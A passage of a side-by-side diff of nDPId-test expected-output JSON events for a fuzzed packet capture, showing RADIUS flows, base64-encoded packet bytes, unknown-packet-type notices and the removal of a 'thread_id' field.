ASthdWRpWS1zZXNzaW9uLWlkPTEwZmYxMGFjMDAwMDAwYjJmZWEwMjI1Yqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 01361{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1528996521324,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":725,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":725,"pkt_l4_len":691,"thread_ts_msec":1528996521324,"pkt":"AAAMB6xAABRP+4rqCABFAALHIMlAAP8RAAAKDEAexuIZNXIQBwQCswAAAQ0CqzlVBXH\/qH48qbcRRfwKWygaCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQMyNwZbIqKpATUwxjExNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3Bwbhp0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZjAtNzktNjAtZDEtN2QtMzceJTBVLWE3LDQyLWQwLWUwLTAwOlZlcml6b25XaUZpQWNjZXNzBTUAAAAIGjEAAAAJASthdWRpWS1zZXNzaW9uLWlkPTEwZmYxMGFjMDAwMDAwYjJmZWEwMjI1Yqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
@@ -21,18 +21,18 @@
00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996603395,"flow_last_seen":1528996603395,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528996603395,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1813,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996603395,"flow_last_seen":1528996603395,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528996603395,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1813,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
01388{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1528996603395,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":745,"pkt_l4_len":711,"thread_ts_msec":1528996603395,"pkt":"AAAMB6xAABRP+4rqCABFAALbIMpAAP8RAAAKDEAexuIZNXIQBxUCxwAABA4Cv7R7V6BSrXIqRSnri9UTMJ0aCnIAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGQVTUEMaCQAAOCENAzABNTAzMTE0ODAwNzM2MzgwNzJAd2xhbi5tbmM0MDAubWNjMzExLjNncHBuZXR3b3JrLm9yZ34IMWNpc2NvBQYAAAAIBAasFAEQCAasFAEWYRQAQP6AAAAAAAAAAAAAAAAAAAAgDlZaV0MyVGVzdExhYhoMAAA3YwEGAAAAAiwgNWIyMmEwZmQvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjA2PQYAAAATGjEAAAAJASthdWRpdC1zZXNzaW9uLWlk3TEwZmYxMGFjMDAwMDAwYjJmZWEwMjI1Yi0GAAAAAUAGAAAADUEGAAAABlEENTY3BlsiovsaFAAAV8gHDlZaV0MyVGVzdExhYhoKAABXyAgERVQaEAAAV8gKClN0YW5kYXJkGhAAAFfICwpUZXN0IExhYhoJAABXyA8DMRoKAABXyBAETkoaEQAAV8gRC0x5bmRodXJzdBoMAABXSBIGAAAAyRoXAABXyB0RVlpXIEMyIFRlc3QgTGFiGgsAAFfIJQVWelcaDQAAOCEOBzA3MDcxGgwAADghEQYAAAAAGhUAADghEg9JbnZhbGlkIFZhcnVlGh0AADghExc0MC44MDQ4ODJOLTc0LjEwMjgzOVcaDAAAOCEUBgAAAQIaDAAAOCEVBgAAAAIaFQAAOCEWD1N0YWRpdW1EaXJlY3QoBgAAAAIqBgFYQ8k0BgAAAAArBpKpaYo1BgAAAAAvBgAD8PkwBgAY5WwxBgAAAAYuBgAAAewpBgAAAAAfE2YwLTc5LTYwLWQxLTdkLTM3HiUwMC1hNy00Mi1kMC1lMC0wMDpWZXJpem9uV2lGaUFjY2RzcxoMAAAFgwcGwFBKmQ=="} 01388{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1528996603395,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":745,"pkt_l4_len":711,"thread_ts_msec":1528996603395,"pkt":"AAAMB6xAABRP+4rqCABFAALbIMpAAP8RAAAKDEAexuIZNXIQBxUCxwAABA4Cv7R7V6BSrXIqRSnri9UTMJ0aCnIAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGQVTUEMaCQAAOCENAzABNTAzMTE0ODAwNzM2MzgwNzJAd2xhbi5tbmM0MDAubWNjMzExLjNncHBuZXR3b3JrLm9yZ34IMWNpc2NvBQYAAAAIBAasFAEQCAasFAEWYRQAQP6AAAAAAAAAAAAAAAAAAAAgDlZaV0MyVGVzdExhYhoMAAA3YwEGAAAAAiwgNWIyMmEwZmQvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjA2PQYAAAATGjEAAAAJASthdWRpdC1zZXNzaW9uLWlk3TEwZmYxMGFjMDAwMDAwYjJmZWEwMjI1Yi0GAAAAAUAGAAAADUEGAAAABlEENTY3BlsiovsaFAAAV8gHDlZaV0MyVGVzdExhYhoKAABXyAgERVQaEAAAV8gKClN0YW5kYXJkGhAAAFfICwpUZXN0IExhYhoJAABXyA8DMRoKAABXyBAETkoaEQAAV8gRC0x5bmRodXJzdBoMAABXSBIGAAAAyRoXAABXyB0RVlpXIEMyIFRlc3QgTGFiGgsAAFfIJQVWelcaDQAAOCEOBzA3MDcxGgwAADghEQYAAAAAGhUAADghEg9JbnZhbGlkIFZhcnVlGh0AADghExc0MC44MDQ4ODJOLTc0LjEwMjgzOVcaDAAAOCEUBgAAAQIaDAAAOCEVBgAAAAIaFQAAOCEWD1N0YWRpdW1EaXJlY3QoBgAAAAIqBgFYQ8k0BgAAAAArBpKpaYo1BgAAAAAvBgAD8PkwBgAY5WwxBgAAAAYuBgAAAewpBgAAAAAfE2YwLTc5LTYwLWQxLTdkLTM3HiUwMC1hNy00Mi1kMC1lMC0wMDpWZXJpem9uV2lGaUFjY2RzcxoMAAAFgwcGwFBKmQ=="}
00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996603395,"flow_last_seen":1528996603395,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528996603395,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1813,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996603395,"flow_last_seen":1528996603395,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528996603395,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1813,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
00496{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":10,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":147,"pkt_type":43690,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":147,"pkt_l4_len":0,"thread_ts_msec":1528996603395,"pkt":"ABRP+4qfcNuYqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"} 00482{"packet_event_id":1,"packet_event_name":"packet","packet_id":10,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":147,"pkt_type":43690,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":147,"pkt_l4_len":0,"thread_ts_msec":1528996603395,"pkt":"ABRP+4qfcNuYqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"}
00213{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":10,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":43690,"global_ts_msec":1528996603490} 00199{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":10,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":43690,"global_ts_msec":1528996603490}
01561{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1528996609526,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":876,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":876,"pkt_l4_len":842,"thread_ts_msec":1528996609526,"pkt":"AAAMB6xAABRP+4rqCABFAANeIMtAAP8RAAAKDEAexuIZNXIQBxUDSgAABA8DQohFBlHb2YvdG6PaZMpxlt8aCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQMwATUwMzExFDgwMjUwODY0NjI4QHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmd+CDFjYXNjbwUGAAAACAQGrBQBEAgGrBQBFWEUAED+gAAAAAAAAAAAAAAAAAAAGYhTQlIyQ0zl2aywoICAgICAEYBzAYAUgZ6M7PeDwdzlup3t95Os3O+5mefgAoA7gZiM5pOJ0PCwmaemg8HY6LaZjoiHu7HC7pebreaZ0PCwl5ustpnM4rGXjOz3g8Hc5bqd7feTrNzvuZngEoAOgeXZrLCi7MWgzYCAgICgFZAGgIzA6rWCjCAOVlpXQzJUZXN0TGFiGgwAADdjAQYAAAACLCI1YjIyYTBmZS8wMDo1NjpjZDo2ZDo0Mjo1OS8yMDc9BgAAABMaMQAAAAkBK2F1ZGl0LXNlc3Npb24taWQ9MTBmZjEwYWMwMDAwMDBiM2ZlYTAyMjViLQYAAAABQAYAAAANQQYAAAAGUQQ1Njeqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"} 01561{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1528996609526,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":876,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":876,"pkt_l4_len":842,"thread_ts_msec":1528996609526,"pkt":"AAAMB6xAABRP+4rqCABFAANeIMtAAP8RAAAKDEAexuIZNXIQBxUDSgAABA8DQohFBlHb2YvdG6PaZMpxlt8aCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQMwATUwMzExFDgwMjUwODY0NjI4QHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmd+CDFjYXNjbwUGAAAACAQGrBQBEAgGrBQBFWEUAED+gAAAAAAAAAAAAAAAAAAAGYhTQlIyQ0zl2aywoICAgICAEYBzAYAUgZ6M7PeDwdzlup3t95Os3O+5mefgAoA7gZiM5pOJ0PCwmaemg8HY6LaZjoiHu7HC7pebreaZ0PCwl5ustpnM4rGXjOz3g8Hc5bqd7feTrNzvuZngEoAOgeXZrLCi7MWgzYCAgICgFZAGgIzA6rWCjCAOVlpXQzJUZXN0TGFiGgwAADdjAQYAAAACLCI1YjIyYTBmZS8wMDo1NjpjZDo2ZDo0Mjo1OS8yMDc9BgAAABMaMQAAAAkBK2F1ZGl0LXNlc3Npb24taWQ9MTBmZjEwYWMwMDAwMDBiM2ZlYTAyMjViLQYAAAABQAYAAAANQQYAAAAGUQQ1Njeqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"}
00589{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1528996609592,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":147,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":147,"pkt_l4_len":113,"thread_ts_msec":1528996609592,"pkt":"ABRP+4rqcNuYVcUnCABFAACFyc1AAPwRiljG4hk1CgxAHgcVchAAcZmUBQ8AaTuYG1n4ee1Aq0+zAcDNdlwBNTAzMTE0ODAyNTA4NjQ2MjhAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3Jrqm9yZywgNWIyMmEwZmUvMDA6NTY6Y2Q6NmQ6NDI6NTkvMjA3"} 00589{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1528996609592,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":147,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":147,"pkt_l4_len":113,"thread_ts_msec":1528996609592,"pkt":"ABRP+4rqcNuYVcUnCABFAACFyc1AAPwRiljG4hk1CgxAHgcVchAAcZmUBQ8AaTuYG1n4ee1Aq0+zAcDNdlwBNTAzMTE0ODAyNTA4NjQ2MjhAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3Jrqm9yZywgNWIyMmEwZmUvMDA6NTY6Y2Q6NmQ6NDI6NTkvMjA3"}
01297{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":13,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":745,"pkt_type":34816,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":745,"pkt_l4_len":0,"thread_ts_msec":1528996609592,"pkt":"AAAMB6xAABRP+4rqiABFAALbIMxAAP8RAAAKDEAexuIZNXIQBxQCxwAAARACv7qQ3oRQOi6G4UsAlSEouDAaCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQMzNwdbIqIcATUwMzExNDgwMDczNjM4MDcyQXdsYW4ubW5jNDgwLm1jYzMxMS4zZ3FwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZjAtNzktNjAtZDEtN2QtM7ceJTAwLWE3LTQyLWQwLWUwLTAwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjMDAwMDA4YjYxY2EzMjI1YiwgNWIyMmEzMWM\/ZjA6Nzk6NjA6ZDE6N2Q6MzcvMjExBAasFAEQIA5WWldDMlRlc3RMYWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABNABgAAAA1BBgAAAAZRBDU2TzoCAQA4ATAzMTE0ODAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZxoUAABXyAcOVlpXQzJUZXN0TGFiGgoAAFfICARFVBoQAABXyAoKU3RhbmRhcmQaEAAAV8gLClRlc3QgTGFiGgkAAFfIDwMxGgoAAFfIEAROShoRAABXyBELTHluZGh1cnN0GgwAAFfIEgYAAADJGhcAAMzIHRFWWlcgQzIgVGVzdCBMYWIaCwAAV8glBVZ6VxoNAAA4IQ4HMDcwNzEaDAAAOCERBgAAAAAaFSUAOCESD0ludmFsaWQgVmFsdWUaHQAAOCETFzQwLjgwNHY4Mk4tNzQuMTAyODM5VxoMAAA4IRQGAAABAhoMAAA4IRUGAAAAAhoVAAA4IRYPU3RhZGl1bURpcmVjYRoMAAAFgwcGwFBKmVASAmScZx+R57CcOV54IGggHQ=="} 01283{"packet_event_id":1,"packet_event_name":"packet","packet_id":13,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":745,"pkt_type":34816,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":745,"pkt_l4_len":0,"thread_ts_msec":1528996609592,"pkt":"AAAMB6xAABRP+4rqiABFAALbIMxAAP8RAAAKDEAexuIZNXIQBxQCxwAAARACv7qQ3oRQOi6G4UsAlSEouDAaCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQMzNwdbIqIcATUwMzExNDgwMDczNjM4MDcyQXdsYW4ubW5jNDgwLm1jYzMxMS4zZ3FwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZjAtNzktNjAtZDEtN2QtM7ceJTAwLWE3LTQyLWQwLWUwLTAwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjMDAwMDA4YjYxY2EzMjI1YiwgNWIyMmEzMWM\/ZjA6Nzk6NjA6ZDE6N2Q6MzcvMjExBAasFAEQIA5WWldDMlRlc3RMYWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABNABgAAAA1BBgAAAAZRBDU2TzoCAQA4ATAzMTE0ODAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZxoUAABXyAcOVlpXQzJUZXN0TGFiGgoAAFfICARFVBoQAABXyAoKU3RhbmRhcmQaEAAAV8gLClRlc3QgTGFiGgkAAFfIDwMxGgoAAFfIEAROShoRAABXyBELTHluZGh1cnN0GgwAAFfIEgYAAADJGhcAAMzIHRFWWlcgQzIgVGVzdCBMYWIaCwAAV8glBVZ6VxoNAAA4IQ4HMDcwNzEaDAAAOCERBgAAAAAaFSUAOCESD0ludmFsaWQgVmFsdWUaHQAAOCETFzQwLjgwNHY4Mk4tNzQuMTAyODM5VxoMAAA4IRQGAAABAhoMAAA4IRUGAAAAAhoVAAA4IRYPU3RhZGl1bURpcmVjYRoMAAAFgwcGwFBKmVASAmScZx+R57CcOV54IGggHQ=="}
00213{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":13,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":34816,"global_ts_msec":1528996636106} 00199{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":13,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":34816,"global_ts_msec":1528996636106}
01268{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":15,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":725,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":725,"pkt_l4_len":0,"thread_ts_msec":1528996636345,"pkt":"ACAMB6wAABRP+4rqCABFAALHIM1AEP8RAAAKDEA+xuIZNXIQBxQCswAAARECq74dUyV3bJoqzJ\/QFk2VsKcaCiUAV8gOBFVTGgwAAFfIDQZsaWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQMzNwZbIqMcATUwMzExNDgwMDczNjM4MDcyQHdsYW4ubX5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZjAtNzktNjAtZDEtN2QtMzceJTAwLWE3LTQyLWQwLWUwLTAwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpRC1zZXNzaW9uLWlkPTEwZmYxMGFjMDAwMDAwYjYxY2EzMjI1YiwgNWIyMmEzMWNRZjA6Nzk6NjA6ZDE6N2Q6MzcvMjExBAasFAEQIA5WWldDMlRlc3RMaWIaDAAAN2MBBgAAAAIGBgAAAAIMBgBLBRQ9BgAAABNABgAAAA1BBgAAAAZRBDU2TyYCAgAkFwEAAAsFAAB6T051twDphk5XQeM2DLlzAwIAIGU7n6gaFAAAV8gHDlZaV0MyVGVzdExhYhoKAABXyAgERVQaEAAAV8gKClN2YW5kYetkGhAAAFfICwpUZXN0IExhYhoJAABXyA8DMRoKAABXyBAETkoaEQAAV8gRC0x5bmRodXJzdBoMAABXyBIGAAAAyRoXAABXyB0RVlpXIEMyIFRlc3QgTGFiGgsAAFfIJQVWelcaDQAAOCEOBzA3MDcxGgwAADghEQYAAAAAGhUAADghEg9JbnZhbGlkIFZhbHVlGh0AADghExc0oC44MDQ4ODJOLTc0LjEwMjgzOVcaDAAAOCEUBgAAAQIaDAAAOCEVBgAAAAIaFQAAOCEWD1N0YWRpdW1EaXJlY3QaDAAABYMHBsBQSplQEuAAmGnGPS3bgZlyWIVRxyA="} 01254{"packet_event_id":1,"packet_event_name":"packet","packet_id":15,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":725,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":725,"pkt_l4_len":0,"thread_ts_msec":1528996636345,"pkt":"ACAMB6wAABRP+4rqCABFAALHIM1AEP8RAAAKDEA+xuIZNXIQBxQCswAAARECq74dUyV3bJoqzJ\/QFk2VsKcaCiUAV8gOBFVTGgwAAFfIDQZsaWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQMzNwZbIqMcATUwMzExNDgwMDczNjM4MDcyQHdsYW4ubX5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZjAtNzktNjAtZDEtN2QtMzceJTAwLWE3LTQyLWQwLWUwLTAwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpRC1zZXNzaW9uLWlkPTEwZmYxMGFjMDAwMDAwYjYxY2EzMjI1YiwgNWIyMmEzMWNRZjA6Nzk6NjA6ZDE6N2Q6MzcvMjExBAasFAEQIA5WWldDMlRlc3RMaWIaDAAAN2MBBgAAAAIGBgAAAAIMBgBLBRQ9BgAAABNABgAAAA1BBgAAAAZRBDU2TyYCAgAkFwEAAAsFAAB6T051twDphk5XQeM2DLlzAwIAIGU7n6gaFAAAV8gHDlZaV0MyVGVzdExhYhoKAABXyAgERVQaEAAAV8gKClN2YW5kYetkGhAAAFfICwpUZXN0IExhYhoJAABXyA8DMRoKAABXyBAETkoaEQAAV8gRC0x5bmRodXJzdBoMAABXyBIGAAAAyRoXAABXyB0RVlpXIEMyIFRlc3QgTGFiGgsAAFfIJQVWelcaDQAAOCEOBzA3MDcxGgwAADghEQYAAAAAGhUAADghEg9JbnZhbGlkIFZhbHVlGh0AADghExc0oC44MDQ4ODJOLTc0LjEwMjgzOVcaDAAAOCEUBgAAAQIaDAAAOCEVBgAAAAIaFQAAOCEWD1N0YWRpdW1EaXJlY3QaDAAABYMHBsBQSplQEuAAmGnGPS3bgZlyWIVRxyA="}
00231{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":15,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":691,"global_ts_msec":1528996636664} 00217{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":15,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":691,"global_ts_msec":1528996636664}
